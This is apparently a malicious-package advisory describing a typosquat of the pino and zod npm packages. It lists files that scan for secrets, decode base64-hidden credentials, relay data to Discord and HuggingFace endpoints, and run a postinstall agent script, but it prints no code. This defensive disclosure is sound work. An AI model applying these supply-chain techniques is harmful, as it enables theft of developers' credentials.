MAL-2026-6273

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (94af4e18fa0fdc7c6aa17842c0dcea9d8ac7632a915cedb0d2150470d07c4e02) Package name typosquats the popular `pino` logger family and `zod` validation library, but the shipped code is unrelated to logging or schema validation. The tarball contains: (1) `dist/secretScan/contentScanner.js` and `dist/secretScan/agentStartupAudit.js`, which scan for secrets and post results to `https://huggingface.co` endpoints; (2) `dist/hfCredentials.js`, which decodes base64-embedded credentials (`Buffer.from(..., 'base64')` at line 50); (3) `dist/discordRelayUpload.js`, which performs base64 decoding and POSTs data to Discord-relay endpoints (POST calls at lines 306/321/398, base64 buffers at lines 461/536); (4) `dist/deploymentDefaults.js`, holding multiple base64-encoded blobs decoded at runtime; (5) `scripts/postinstall-agent.mjs`, an install-time agent script with network/GET behavior; and (6) `scripts/encode-deployment.mjs`, the author's encoder for the embedded blobs. The combination of an install-time agent script, base64-obfuscated configuration/credentials, and exfiltration-shaped relays to Discord and HuggingFace under a name that mimics legitimate logging/validation packages is a credential-harvest and data-relay supply-chain attack against installers.